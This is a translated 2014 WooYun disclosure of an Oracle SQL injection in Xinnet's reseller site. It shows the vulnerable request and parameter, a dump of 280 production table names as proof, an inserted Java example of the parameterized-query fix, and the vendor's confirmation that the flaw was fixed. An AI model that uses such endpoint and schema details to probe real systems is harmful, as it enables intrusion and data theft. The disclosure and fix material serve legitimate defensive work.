
Vulnerability summary

Defect ID: wooyun-2014-070448

Title: An Oracle injection vulnerability in the Xinnet agent (reseller) system

Vendor: 新网华通信息技术有限公司 (Xinnet)

Author: 路人哥哥

Submitted: 2014-07-31 12:59

Fix time: 2014-09-14 13:00

Public disclosure: 2014-09-14 13:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-07-31: Details sent to the vendor, awaiting vendor handling
2014-07-31: Vendor confirmed; details disclosed to the vendor only
2014-08-10: Details disclosed to core white hats and domain experts
2014-08-20: Details disclosed to regular white hats
2014-08-30: Details disclosed to intern white hats
2014-09-14: Details disclosed to the public

Brief description:

An Oracle injection vulnerability in the Xinnet agent site

Detailed description:

POST /web/DomainTransferAction.do?method=isTemporary HTTP/1.1
Host: agent.xinnet.com
Proxy-Connection: keep-alive
Content-Length: 113
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://agent.xinnet.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://agent.xinnet.com/domain/manage.do?method=list&serviceState=02&forward=inusing
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: Hm_lvt_4a3d4*****3ad11805cc3dc1e4a=1403000256,1405233427; _ga=GA1.2.1504825920.1396931326; BIGipServerdlqiantai_10.3.1.16_17=285278986.36895.0000; JSESSIONID=
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.2
domainNameDNS=test.com&tempm=21ca4197203ae23a****e960edae58&newString=4423ac355902b******eec661142e56&flag=2


The domainNameDNS parameter in the request body above is passed to the database without any filtering, so its value becomes part of the Oracle query.
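The report only states that domainNameDNS reaches the query unfiltered; the following is an added illustration written for this page, not Xinnet's code. It shows the defect class (string concatenation of a request parameter into SQL text) next to the fix a Java/JDBC application would apply: a constant query with a bind variable, plus an allow-list check on the value before it is used. The table SERVICE_DOMAINTRANSFER appears in the dump above; the column DOMAIN_NAME, the method names and the query itself are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

// Added example, not the vendor's code. Table SERVICE_DOMAINTRANSFER is taken
// from the report's table list; column DOMAIN_NAME and the query are assumed.
public class DomainTransferLookup {

    // Vulnerable pattern (assumed shape of the defect described in the report):
    // the request parameter is concatenated straight into the SQL text, so the
    // client controls part of the statement the database executes.
    public static String buildQueryUnsafe(String domainNameDNS) {
        return "SELECT COUNT(*) FROM SERVICE_DOMAINTRANSFER WHERE DOMAIN_NAME = '"
                + domainNameDNS + "'";
    }

    // Hardened form: the SQL text is a constant and the value travels to Oracle
    // as a bind variable, so it can never change the structure of the statement.
    private static final String QUERY =
            "SELECT COUNT(*) FROM SERVICE_DOMAINTRANSFER WHERE DOMAIN_NAME = ?";

    public static boolean isTemporary(Connection conn, String domainNameDNS)
            throws SQLException {
        // Defence in depth: reject anything that is not shaped like a domain
        // name before it gets near the database.
        if (!isPlausibleDomainName(domainNameDNS)) {
            throw new IllegalArgumentException("invalid domain name");
        }
        try (PreparedStatement ps = conn.prepareStatement(QUERY)) {
            ps.setString(1, domainNameDNS);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() && rs.getInt(1) > 0;
            }
        }
    }

    // Allow-list check: LDH labels (letters, digits, hyphen), each 1-63 chars,
    // at least two labels, whole name at most 253 chars. String.matches()
    // anchors the pattern to the entire input.
    public static boolean isPlausibleDomainName(String s) {
        return s != null
                && s.length() <= 253
                && s.matches("(?i)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?"
                           + "(\\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)+");
    }
}
```

The bind variable is the actual fix; the allow-list is an extra layer that also helps detection, because a rejected value can be logged with the client address and parameter name, which is exactly the signal a WAF rule or SIEM search for this endpoint would key on.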

Proof of vulnerability:

Proof screenshot: 3AE8081F-FF0A-4085-9F4D-3E329A7A808C.png


Database: XINNET
[280 tables]
+--------------------------------+
| None |
| AGENT_ACCOUNT |
| AGENT_ACCOUNTDETAIL |
| AGENT_AGENT |
| AGENT_AGENT_BAK_20131008 |
| AGENT_AGENT_TMP |
| AGENT_AUTHORIZED |
| AGENT_CONTRACT |
| AGENT_GRANT |
| AGENT_LEVEL |
| AGENT_LEVELADJUST |
| AGENT_LEVELADJUST_MANUAL |
| AGENT_LEVELCONDITION |
| AGENT_LEVELRULE |
| AGENT_RECEPTION |
| AGENT_RECEPTION_VALIDATE |
| AGENT_TRANSFERSETTING |
| AGENT_USERINFO |
| API_APPLY |
| API_SETTING |
| BAK1231SERVICE_VIRTUALHOSTTRAN |
| CHINACNBAK20090202 |
| CORE_PROVINCE |
| DN |
| DOMAIN_AUDIT |
| DOMAIN_EN |
| DOMAIN_UNPASS_REASON |
| EXPDP_XINNET_20100731_020001 |
| EXPDP_XINNET_20100801_140002 |
| EXPDP_XINNET_20100802_020001 |
| EXPDP_XINNET_20100802_080001 |
| EXPDP_XINNET_20100803_140001 |
| EXPDP_XINNET_20101023_220001 |
| EXPDP_XINNET_20101030_060001 |
| EXPDP_XINNET_20101030_220001 |
| EXPDP_XINNET_20101102_060001 |
| EXPDP_XINNET_20101102_220001 |
| EXPDP_XINNET_20101105_220001 |
| EXPDP_XINNET_20101109_060001 |
| EXPDP_XINNET_20101112_060002 |
| EXPDP_XINNET_20101112_220001 |
| EXPDP_XINNET_20101118_060001 |
| EXPDP_XINNET_20110615_224735 |
| EXPDP_XINNET_20110616_224731 |
| EXPDP_XINNET_20110617_061838 |
| EXPDP_XINNET_20110617_224742 |
| EXPDP_XINNET_20110618_061831 |
| EXPDP_XINNET_20110618_224728 |
| EXPDP_XINNET_20110619_061837 |
| EXPDP_XINNET_20110619_224729 |
| EXPDP_XINNET_20110620_061839 |
| EXPDP_XINNET_20110620_224733 |
| EXPDP_XINNET_20110915_225453 |
| EXPDP_XINNET_20111006_225533 |
| EXPDP_XINNET_20111013_225635 |
| EXPDP_XINNET_20111022_225651 |
| EXPDP_XINNET_20111116_225857 |
| EXPDP_XINNET_20111117_225622 |
| EXPDP_XINNET_20111118_223308 |
| EXPDP_XINNET_20111120_220333 |
| EXPDP_XINNET_20111122_220317 |
| EXPDP_XINNET_20111123_220304 |
| EXPDP_XINNET_20111124_104204 |
| FENGLING_DOMAIN_33W |
| FENGLING_DOMAIN_BEIAN |
| FENGLING_DOMAIN_ZILIAO |
| FINANCE_AGENTINVOICE |
| FINANCE_AGENTINVOICE_DELETE |
| FINANCE_CAPINFO |
| FINANCE_GATHERING |
| FINANCE_GATHERINGDETAIL |
| FINANCE_GATHERINGINVOICE |
| FINANCE_GATHERINGMODE |
| FINANCE_LOANRATING |
| FINANCE_PAYMENT |
| FINANCE_PAYMENTDETAIL |
| FINANCE_PAYMENTMODE |
| GLB_IP |
| GOODS_COSTLIMITPRICE |
| GOODS_GOODS |
| GOODS_GOODS090331 |
| GOODS_GOODSITEM |
| GOODS_GOODSITEMCOSTLIMITPRICE |
| GOODS_GOODS_20131228 |
| GOODS_PROMOTION |
| GOODS_PROMOTIONPRICE |
| GOODS_TASTE |
| ICP_CDN_REASON |
| ICP_CDN_VERIFY |
| INVOICE_POST_INFO |
| INVOICE_QUALIFICATION_INFO |
| IPDEL |
| IPDEL1 |
| LOG_AGENTLOG |
| LOG_DCP |
| LOG_DOMAINBIZ |
| LOG_DOMAINBIZ_20140301 |
| LOG_DOMAINFAILED |
| LOG_DOMAINLOG |
| LOG_DOMAINTEMPLATE |
| LOG_LOGIN |
| LOG_PRODUCTLOG |
| ORDER_FEE |
| ORDER_FEEITEM |
| ORDER_HANDLINGCHARGE |
| ORDER_ORDER |
| ORDER_ORDERLINE |
| ORDER_ORDERLINEFEE |
| ORDER_ORDERLINEINFO |
| ORDER_TOTALMONEY |
| PRICE_GOODSITEMPRICE |
| PRICE_GOODSITEMPRICE_20130402 |
| PRICE_GOODSITEMPRICE_20130403 |
| PRICE_GOODSITEMPRICE_20130723 |
| PRICE_PRICE |
| PRICE_REGIONGOODSITEMPRICE |
| PRICE_REGIONPRICE |
| PRICE_RENEWPRICE |
| PRODUCT_AGREEMENT |
| PRODUCT_COSTLIMITPRICE |
| PRODUCT_DOMAINTYPE |
| PRODUCT_MAILGLOBAL |
| PRODUCT_NOTIFY |
| PRODUCT_NOTIFYBAK |
| PRODUCT_PARAMETER |
| PRODUCT_PARAMETERGROUP |
| PRODUCT_PRODUCT |
| PRODUCT_PRODUCT090331 |
| PRODUCT_PRODUCTAGREEMENT |
| PRODUCT_PRODUCTCLASS |
| PRODUCT_PRODUCTCLASS_20131228 |
| PRODUCT_PRODUCTMANAGER |
| PRODUCT_PRODUCTNOTIFY |
| PRODUCT_PRODUCT_20131228 |
| PRODUCT_PROVIDER |
| PRODUCT_PROVIDERMANAGER |
| PRODUCT_PROVIDERUSERINFO |
| PRODUCT_SERVERGROUP |
| PRODUCT_SERVICETYPE |
| PRODUCT_SERVICETYPE_20131229_1 |
| PRODUCT_SUBPRODUCT |
| PRODUCT_SUBPRODUCT_20131229_1 |
| PRODUCT_UPGRADELINE |
| PRODUCT_UPGRADELINEINFO |
| QY_AGAIN |
| QY_BD_MAIL |
| QY_BD_MAIL_HY |
| QY_C |
| QY_H1 |
| QY_H2 |
| QY_H3 |
| QY_HOSTCLUB |
| QY_M |
| QY_MAILBAK20091105 |
| REAL_NAME_CDN_REASON |
| REGION |
| SALE_ORGANLEVEL |
| SALE_ORGANLEVELINFO |
| SALE_ORGANRANGE |
| SALE_SALEGROUP |
| SALE_SALESLEVEL |
| SALE_SALESMAN |
| SALE_SALESMANGROUP |
| SALE_SALESMANLEVEL |
| SALE_TASK |
| SERVCENTER_ADVICE |
| SERVCENTER_ADVICERE |
| SERVCENTER_QUESTION |
| SERVCENTER_RESEARCH |
| SERVCENTER_RESEARCHLOG |
| SERVCENTER_RESEARCHOPTION |
| SERVCENTER_RESEARCHQUESTION |
| SERVCENTER_RESEARCHRESULT |
| SERVCENTER_SERVDOC |
| SERVCENTER_SERVFAQ |
| SERVCENTER_SERVMAILTASK |
| SERVCENTER_SERVMAILTEMPLET |
| SERVCENTER_SERVNOTIFY |
| SERVCENTER_SERVTYPE |
| SERVICE_CHECKCODE |
| SERVICE_DOMAINCHANGEOWNER |
| SERVICE_DOMAINDEL |
| SERVICE_DOMAINEX |
| SERVICE_DOMAINGOVCN |
| SERVICE_DOMAINICP |
| SERVICE_DOMAINNAMESERVER |
| SERVICE_DOMAINPHOTO |
| SERVICE_DOMAINPOLL |
| SERVICE_DOMAINPRE |
| SERVICE_DOMAINQUESTIONERESET |
| SERVICE_DOMAINRENEW |
| SERVICE_DOMAINSUBPRODUCT |
| SERVICE_DOMAINTEMPLATE |
| SERVICE_DOMAINTEMPLATEDEL |
| SERVICE_DOMAINTRANSATION |
| SERVICE_DOMAINTRANSFER |
| SERVICE_DOMAINTRANSFERAGENT |
| SERVICE_DOMAINUSERINFO |
| SERVICE_DOMAINUSERINFODEL |
| SERVICE_DOMAIN_0920 |
| SERVICE_DOMAIN_AUDIT_CHANGE |
| SERVICE_DOMAIN_HB_FAIL |
| SERVICE_DOMAIN_MBV |
| SERVICE_DOMAIN_TEST_TEMP |
| SERVICE_HOST090331 |
| SERVICE_ICPDOMAIN |
| SERVICE_MAIL |
| SERVICE_MAIL090331 |
| SERVICE_MAILDEL |
| SERVICE_MAILPRE |
| SERVICE_MAILSUBPRODUCT |
| SERVICE_MAILTRANSFERAGENT |
| SERVICE_MAILUPGRADE |
| SERVICE_MAILVIP_BAKO903 |
| SERVICE_MAIL_YDP |
| SERVICE_TASTE |
| SERVICE_TEMPLATEDOMAIN |
| SERVICE_TEMPLATEREGUSER |
| SERVICE_TEMPLATEVERIFY |
| SERVICE_VHOSTTRANSFERAGENT |
| SERVICE_VIRTUALHOST |
| SERVICE_VIRTUALHOSTDEL |
| SERVICE_VIRTUALHOSTDEL20130531 |
| SERVICE_VIRTUALHOSTPRE |
| SERVICE_VIRTUALHOSTPRE20130531 |
| SERVICE_VIRTUALHOSTPRE_130820 |
| SERVICE_VIRTUALHOSTPRE_BAKLI |
| SERVICE_VIRTUALHOSTSUBPRODUCT |
| SERVICE_VIRTUALHOSTTRAN |
| SERVICE_VIRTUALHOSTUPGRADE |
| SERVICE_VIRTUALHOST_20111114 |
| SERVICE_VIRTUALHOST_CHAR |
| SERVICE_VIRTUALHOST_X1 |
| SERVICE_VZZJZ |
| SERVICE_VZZJZDEL |
| SERVICE_VZZJZPRE |
| SERVICE_VZZJZUPGRADE |
| SERVICE_VZZJZ_BUTTON |
| SPECIAL_CLOUD_HOST |
| SYS_ACCOUNT |
| SYS_EXPORT_SCHEMA_01 |
| SYS_EXPORT_SCHEMA_02 |
| SYS_EXPORT_SCHEMA_03 |
| TEMP_CUSTOMER |
| TEMP_ICP_MYSQL |
| TEMP_ICP_RESULT2 |
| TEMP_ICP_RESULT3 |
| TEMP_REG |
| TEMP_REG1 |
| TEMP_REG2 |
| TEMP_ZYYDOMAIN |
| TEST_SEQ |
| TEST_SERVCIECOUNT |
| T_THEME |
| T_THEME_COLOR |
| T_THEME_GRADE |
| T_THEME_INDUSTRY |
| VHOST_IP_CNAME |
| VHOST_USER_NAME |
| VHOST_YEWU |
| VHOST_YUNWEI |
| VPN_AGENT_ACCOUNT |
| VPN_AGENT_AGENT |
| VPN_AGENT_USERINFO |
| VPN_API_SETTING |
| VPN_PRODUCT_MAILGLOBAL |
| VPN_SERVICE_DOMAIN |
| VPN_SERVICE_DOMAINDEL |
| VPN_SERVICE_DOMAINEX |
| VPN_SERVICE_DOMAINTRANSFER |
| VPN_SERVICE_MAIL |
| VPN_SERVICE_VIRTUALHOST |
| VPS_CONFIGURATION |
| VPS_CONFIGURATION_DETAIL |
| VPS_SERVICEINFO |
| VPS_SERVICE_BIND |
| VPS_SERVICE_BSS |
| VZZJZGL_APPLY |
| WOSHIMC |
| ZYY_DOMAINPRODUCT_BAK |
+--------------------------------+

Fix recommendation:

Copyright notice: please credit 路人哥哥@乌云 when reposting


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-07-31 13:16

Vendor reply:

Many thanks to 路人哥哥@乌云; Xiaoxin (Xinnet) is working flat out to confirm and fix it.

Latest status:

2014-08-04: Vulnerability fixed; many thanks to 路人哥哥@乌云



Vulnerability rating:

Comments

  1. 2014-07-31 13:03 | Jack.Chalres ( intern white hat | Rank:39 vulnerabilities:15 | ..............)

    mark. Watching from the front row.